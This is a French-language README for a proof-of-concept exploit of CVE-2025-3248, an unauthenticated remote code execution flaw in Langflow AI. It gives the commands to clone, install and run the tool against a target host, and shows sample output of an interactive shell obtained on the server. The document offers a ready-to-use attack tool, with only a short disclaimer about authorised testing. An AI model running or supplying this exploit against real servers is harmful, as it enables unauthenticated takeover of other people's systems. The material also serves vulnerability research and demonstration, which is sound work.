
Exploit pour l'exécution de code à distance (non authentifié) sur Langflow AI
Cet exploit cible une vulnérabilité critique RCE non authentifiée (CVE-2025-3248) dans Langflow AI. La vulnérabilité permet à un attaquant d'exécuter des commandes système arbitraires sur le serveur cible via le point de terminaison /api/v1/validate/code.
Cet outil de preuve de concept (PoC) fournit un shell interactif pour tester et démontrer le problème.
pip3 pour installer les dépendancesgit clone https://github.com/yourusername/CVE-2025-3248.git
cd CVE-2025-3248
pip3 install -r requirements.txt
python3 CVE-2025-3248.py -u http://TARGET_HOST:PORT
python3 CVE-2025-3248.py -u http://127.0.0.1:7860
Un shell interactif apparaîtra :
0xgh057r3c0n@root💀$ whoami
langflow
0xgh057r3c0n@root💀$ uname -a
Linux ubuntu 5.15.0-89-generic #99~20.04.1-Ubuntu SMP ...
exit ou quitCe projet est sous licence MIT — voir le fichier LICENSE pour plus de détails.
Ce logiciel est fourni uniquement à des fins éducatives et de recherche. L'auteur décline toute responsabilité en cas d'utilisation abusive de ce code. Utilisez uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test.